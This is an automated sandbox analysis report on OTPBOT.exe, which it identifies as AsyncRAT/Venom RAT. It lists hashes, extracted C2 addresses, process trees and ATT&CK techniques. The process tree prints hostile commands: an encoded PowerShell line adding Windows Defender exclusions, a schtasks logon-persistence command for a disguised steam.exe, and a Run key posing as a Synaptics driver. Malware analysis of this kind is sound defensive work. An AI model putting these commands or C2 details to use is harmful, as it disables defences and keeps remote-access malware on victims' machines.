Analysis
-
max time kernel
144s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
17-07-2024 10:14
Static task
static1
Behavioral task
behavioral1
Sample
OTPBOT.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
OTPBOT.exe
Resource
win10v2004-20240709-en
General
-
Target
OTPBOT.exe
-
Size
16.7MB
-
MD5
d76d4061a38546dda1d9748588b75f18
-
SHA1
adbcd8ada656dddd3809bdd8061f59fbb53351bd
-
SHA256
7c833f195a6be1c64c85cca8f227f0226726609bc564f9577ef81924aa99c1b4
-
SHA512
f4cdfe95be590c55fd32fcaf711961ab67fcee8dcceeb44bf8cb4e6e2208b207073ba7a329a843ac1d63d5f5a2d8fae78dc2043afc4b2829757246c05eff7fb1
-
SSDEEP
393216:Ib7D+eNMC7Z61Kqm/1MpfnZ0ZjupISFOxcyUVBWABkgr0:U/mCNoZm9ML05ualxc0E
Malware Config
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
10.0.2.15:9090
10.0.2.15:52033
147.185.221.19:9090
147.185.221.19:52033
wbrjnemduvixdculy
-
delay
1
-
install
true
-
install_file
steam.exe
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x00060000000195de-181.dat family_asyncrat -
resource behavioral1/files/0x0006000000019516-85.dat behavioral1/files/0x000a000000018be5-98.dat behavioral1/files/0x0008000000019516-109.dat -
Executes dropped EXE 8 IoCs
pid Process 2704 ._cache_OTPBOT.exe 2800 Synaptics.exe 2724 ._cache_Synaptics.exe 1696 OTP_BOT.exe 1608 NOBLOCKTM.exe 2396 ._cache_NOBLOCKTM.exe 2984 OTP_BOT.exe 1256 steam.exe -
Loads dropped DLL 11 IoCs
pid Process 1628 OTPBOT.exe 1628 OTPBOT.exe 1628 OTPBOT.exe 2800 Synaptics.exe 2800 Synaptics.exe 2704 ._cache_OTPBOT.exe 1872 Process not Found 1608 NOBLOCKTM.exe 1608 NOBLOCKTM.exe 1696 OTP_BOT.exe 2984 OTP_BOT.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" OTPBOT.exe -
pid Process 1352 powershell.exe 2004 powershell.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x000500000001952c-121.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 1 IoCs
pid Process 2576 timeout.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2420 schtasks.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2136 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 1352 powershell.exe 2004 powershell.exe 2396 ._cache_NOBLOCKTM.exe 2396 ._cache_NOBLOCKTM.exe 2396 ._cache_NOBLOCKTM.exe 1256 steam.exe 1256 steam.exe 1256 steam.exe 1256 steam.exe 1256 steam.exe 1256 steam.exe 1256 steam.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1352 powershell.exe Token: SeDebugPrivilege 2004 powershell.exe Token: SeDebugPrivilege 2396 ._cache_NOBLOCKTM.exe Token: SeDebugPrivilege 1256 steam.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2136 EXCEL.EXE 1256 steam.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 1628 wrote to memory of 2704 1628 OTPBOT.exe 30 PID 1628 wrote to memory of 2704 1628 OTPBOT.exe 30 PID 1628 wrote to memory of 2704 1628 OTPBOT.exe 30 PID 1628 wrote to memory of 2704 1628 OTPBOT.exe 30 PID 1628 wrote to memory of 2800 1628 OTPBOT.exe 31 PID 1628 wrote to memory of 2800 1628 OTPBOT.exe 31 PID 1628 wrote to memory of 2800 1628 OTPBOT.exe 31 PID 1628 wrote to memory of 2800 1628 OTPBOT.exe 31 PID 2800 wrote to memory of 2724 2800 Synaptics.exe 32 PID 2800 wrote to memory of 2724 2800 Synaptics.exe 32 PID 2800 wrote to memory of 2724 2800 Synaptics.exe 32 PID 2800 wrote to memory of 2724 2800 Synaptics.exe 32 PID 2704 wrote to memory of 1352 2704 ._cache_OTPBOT.exe 34 PID 2704 wrote to memory of 1352 2704 ._cache_OTPBOT.exe 34 PID 2704 wrote to memory of 1352 2704 ._cache_OTPBOT.exe 34 PID 2724 wrote to memory of 2004 2724 ._cache_Synaptics.exe 36 PID 2724 wrote to memory of 2004 2724 ._cache_Synaptics.exe 36 PID 2724 wrote to memory of 2004 2724 ._cache_Synaptics.exe 36 PID 2704 wrote to memory of 1696 2704 ._cache_OTPBOT.exe 38 PID 2704 wrote to memory of 1696 2704 ._cache_OTPBOT.exe 38 PID 2704 wrote to memory of 1696 2704 ._cache_OTPBOT.exe 38 PID 2704 wrote to memory of 1608 2704 ._cache_OTPBOT.exe 40 PID 2704 wrote to memory of 1608 2704 ._cache_OTPBOT.exe 40 PID 2704 wrote to memory of 1608 2704 ._cache_OTPBOT.exe 40 PID 2704 wrote to memory of 1608 2704 ._cache_OTPBOT.exe 40 PID 1608 wrote to memory of 2396 1608 NOBLOCKTM.exe 42 PID 1608 wrote to memory of 2396 1608 NOBLOCKTM.exe 42 PID 1608 wrote to memory of 2396 1608 NOBLOCKTM.exe 42 PID 1608 wrote to memory of 2396 1608 NOBLOCKTM.exe 42 PID 2724 wrote to memory of 1716 2724 ._cache_Synaptics.exe 43 PID 2724 wrote to memory of 1716 2724 ._cache_Synaptics.exe 43 PID 2724 wrote to memory of 1716 2724 ._cache_Synaptics.exe 43 PID 1696 wrote to memory of 2984 1696 OTP_BOT.exe 44 PID 1696 wrote to memory of 2984 1696 OTP_BOT.exe 44 PID 1696 wrote to memory of 2984 1696 OTP_BOT.exe 44 PID 2396 wrote to memory of 2748 2396 ._cache_NOBLOCKTM.exe 45 PID 2396 wrote to memory of 2748 2396 ._cache_NOBLOCKTM.exe 45 PID 2396 wrote to memory of 2748 2396 ._cache_NOBLOCKTM.exe 45 PID 2396 wrote to memory of 2836 2396 ._cache_NOBLOCKTM.exe 47 PID 2396 wrote to memory of 2836 2396 ._cache_NOBLOCKTM.exe 47 PID 2396 wrote to memory of 2836 2396 ._cache_NOBLOCKTM.exe 47 PID 2748 wrote to memory of 2420 2748 cmd.exe 49 PID 2748 wrote to memory of 2420 2748 cmd.exe 49 PID 2748 wrote to memory of 2420 2748 cmd.exe 49 PID 2836 wrote to memory of 2576 2836 cmd.exe 50 PID 2836 wrote to memory of 2576 2836 cmd.exe 50 PID 2836 wrote to memory of 2576 2836 cmd.exe 50 PID 2836 wrote to memory of 1256 2836 cmd.exe 52 PID 2836 wrote to memory of 1256 2836 cmd.exe 52 PID 2836 wrote to memory of 1256 2836 cmd.exe 52 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\OTPBOT.exe"C:\Users\Admin\AppData\Local\Temp\OTPBOT.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1628 -
C:\Users\Admin\AppData\Local\Temp\._cache_OTPBOT.exe"C:\Users\Admin\AppData\Local\Temp\._cache_OTPBOT.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcgB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAeQB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AbQBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYgBhACMAPgA="3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1352
-
-
C:\Users\Admin\AppData\Local\Temp\OTP_BOT.exe"C:\Users\Admin\AppData\Local\Temp\OTP_BOT.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1696 -
C:\Users\Admin\AppData\Local\Temp\OTP_BOT.exe"C:\Users\Admin\AppData\Local\Temp\OTP_BOT.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2984
-
-
-
C:\Users\Admin\AppData\Local\Temp\NOBLOCKTM.exe"C:\Users\Admin\AppData\Local\Temp\NOBLOCKTM.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Users\Admin\AppData\Local\Temp\._cache_NOBLOCKTM.exe"C:\Users\Admin\AppData\Local\Temp\._cache_NOBLOCKTM.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2396 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "steam" /tr '"C:\Users\Admin\AppData\Roaming\steam.exe"' & exit5⤵
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "steam" /tr '"C:\Users\Admin\AppData\Roaming\steam.exe"'6⤵
- Scheduled Task/Job: Scheduled Task
PID:2420
-
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp34B7.tmp.bat""5⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\system32\timeout.exetimeout 36⤵
- Delays execution with timeout.exe
PID:2576
-
-
C:\Users\Admin\AppData\Roaming\steam.exe"C:\Users\Admin\AppData\Roaming\steam.exe"6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1256
-
-
-
-
-
-
C:\ProgramData\Synaptics\Synaptics.exe"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe"C:\Users\Admin\AppData\Local\Temp\._cache_Synaptics.exe" InjUpdate3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AcgB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAeQB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AbQBtACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHYAYgBhACMAPgA="4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2004
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2724 -s 8404⤵PID:1716
-
-
-
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2136
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
16.7MB
MD5d76d4061a38546dda1d9748588b75f18
SHA1adbcd8ada656dddd3809bdd8061f59fbb53351bd
SHA2567c833f195a6be1c64c85cca8f227f0226726609bc564f9577ef81924aa99c1b4
SHA512f4cdfe95be590c55fd32fcaf711961ab67fcee8dcceeb44bf8cb4e6e2208b207073ba7a329a843ac1d63d5f5a2d8fae78dc2043afc4b2829757246c05eff7fb1
-
Filesize
16.0MB
MD5e42b1ae9636a7f13d6cda41da36604bf
SHA10f54c779d595f8ceaa8aff579b90de40824f5b9b
SHA2566eead15ccfccb3f580f87df6545909ce1ab70544837d0ad8385787a674b5f974
SHA512235cd965cb26f7c22296bf1759c9335e8244f6021e0df7dc9f362a9160ac03121eea54fbedefbc5a10dd9a65811c22a24d0c1b6384e62b2b460bdbee8e64bfa6
-
Filesize
828KB
MD5a1b498723fda03e583ef35e2c1a90d3e
SHA1cbc749bf7d6fcc9266c6e794fc94009f1f6ca448
SHA25623292a648da1e75a5e3c8fb8c540aab8e62060fc0a207305c9e52a27710ea360
SHA5120456d1ebdc37ec89c733026d5fa77e272bcfb4da35b29cd294a34748c9b83fe2eb31014a7b5a1a33205a478204ca801f83e84688abc76e275a6bdbe1cb03aa4a
-
Filesize
5.5MB
MD5e2bd5ae53427f193b42d64b8e9bf1943
SHA17c317aad8e2b24c08d3b8b3fba16dd537411727f
SHA256c4844b05e3a936b130adedb854d3c04d49ee54edb43e9d36f8c4ae94ccb78400
SHA512ae23a6707e539c619fd5c5b4fc6e4734edc91f89ebe024d25ff2a70168da6105ac0bd47cf6bf3715af6411963caf0acbb4632464e1619ca6361abf53adfe7036
-
Filesize
17KB
MD5e566fc53051035e1e6fd0ed1823de0f9
SHA100bc96c48b98676ecd67e81a6f1d7754e4156044
SHA2568e574b4ae6502230c0829e2319a6c146aebd51b7008bf5bbfb731424d7952c15
SHA512a12f56ff30ea35381c2b8f8af2446cf1daa21ee872e98cad4b863db060acd4c33c5760918c277dadb7a490cb4ca2f925d59c70dc5171e16601a11bc4a6542b04
-
Filesize
30KB
MD56ee3318724d56fd71635f3fdb1a29be6
SHA1a5a474d6b287c23324b429318aec760d9931c211
SHA256584128afaa89461b753e9a474e2df62d01d0a6950e87181e82bade295564a459
SHA512bba7619773c0ad0172a524e5241c7fd58d10a1c213aef6412d9ba770a8cc3a44dda683bcda30efdb28eda8b3eb98f12bcb09cfdbdfca9244946819a42f6bff2c
-
Filesize
25KB
MD5a406a5fbe39ec916ac232810770ec8e1
SHA151b2b75c5078ac01f68529e4ecc0ec1723a92f54
SHA256951c25647fa0ecb0f4806ba09391f124940819af46c4f0d5b919d6d941727fb6
SHA512ed9f93b8124b249198eaf0997d566f001b7fac3488eb28d71e6e39605ba8ee5f9cf95bc5da3f5e3bd784d9aee5b712d0d39dd61cfc88665191d9b19216c67cf6
-
Filesize
29KB
MD55adb9017beebaaef59f1a29d560f83a1
SHA1d29e63ed91e6d0543d1ee73e105877608baf41c2
SHA25693dcf23b54d7c58d459dfc970214ef698e644ac030f1c891d2fa2686d6d74858
SHA512d3b7a912d69c804c8040e18d908bd3ff5d530a055c5fbf7c463e6ab6b078ddd9f854f2ad49485f08b7f44184f3b33c56bbb4b96cb394eabada7956eb708adfad
-
Filesize
29KB
MD5610c028c416bff7a3fcada0a943fc3ca
SHA1033fb2ea964b2cd7ac6c963fecab8baf0887c433
SHA25651f868298a7a5f511ec1b126e371c9f8c0d077d977765980385f8b2fb34795f9
SHA512eefe9f42c5018d208623b730794db2d6843556d6b27c8ec916526d154ba28d98f8be2bd1481426ba9e39405c47af91168f109eda169fddc71940fb725ac6fe35
-
Filesize
149B
MD5980ad03ff6b9f8048df7670a3e85f16a
SHA1c5bcaf78e38b50cc56c3b663c65f2fb00bb70145
SHA256852bcbe32f584bde53163c182f329e74199cf003f57d35d0a83a12bad4883c31
SHA51277c4b9e8a7aacd793e9c1ee31bcce37d32f2527ecca75b5d005c91d4c89a33ca739baa06cbd5ebd23f6db7cc73ce14e2ed071f51b77afaf2c4a7c6ca6b9296ef
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5bd89320c78d45d4068f3fbd38a74e8f5
SHA1a9c2a8d4ee5232b5613037063b27f7931330c5f1
SHA2569eb0e0bb3e5b2e5439dd3b5a1e97a8af9d435857974244a333bc48110ebc0b4a
SHA512ad1871fdf730e6ad5cd7cd784ad1ad8d2de1ea029d29dbcfb81428b35b523aee1e084f5bf71d111d870d16bf41f8d1f5250f85b7269d02743b6ac5013e3de49a
-
Filesize
8B
MD5cf759e4c5f14fe3eec41b87ed756cea8
SHA1c27c796bb3c2fac929359563676f4ba1ffada1f5
SHA256c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
SHA512c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b
-
Filesize
165B
MD5ff09371174f7c701e75f357a187c06e8
SHA157f9a638fd652922d7eb23236c80055a91724503
SHA256e4ba04959837c27019a2349015543802439e152ddc4baf4e8c7b9d2b483362a8
SHA512e4d01e5908e9f80b7732473ec6807bb7faa5425e3154d5642350f44d7220af3cffd277e0b67bcf03f1433ac26a26edb3ddd3707715b61d054b979fbb4b453882
-
Filesize
74KB
MD520b0761336c5b0811ebfd3ce052a065a
SHA1028760051e74205d80253152ba9d638537536a3d
SHA256db35164ac870bfdde1f5883ad6156ce6e6e9b09d673813432f292aeddfc0c2f2
SHA512edef14c446a7750fabeccb27165e99b7ee194b5433a078e137c9f0d3d9a61fd0c88036283adb04b9e19d2c7f65365ff91e52a1f7d90431d5137ca6bfdc932d96
-
Filesize
15.2MB
MD505e130106948344f7104d92044431ef6
SHA1daaf32ffdbddc8129ff563f279ea24422c706ec3
SHA256a2f3bae44a9bf5b85db8f1fbfabfad377b1f31cc151ee9a2ac6d824bb4d5c09e
SHA512431f804f00a2d6e191b4a0592fddd7731fa8bc47a39b277e037f65d6566a1dd0a83e854ecea3b3de77704e0fd975d5a2371c7ed189dfa3eefc9ebab3f6f67634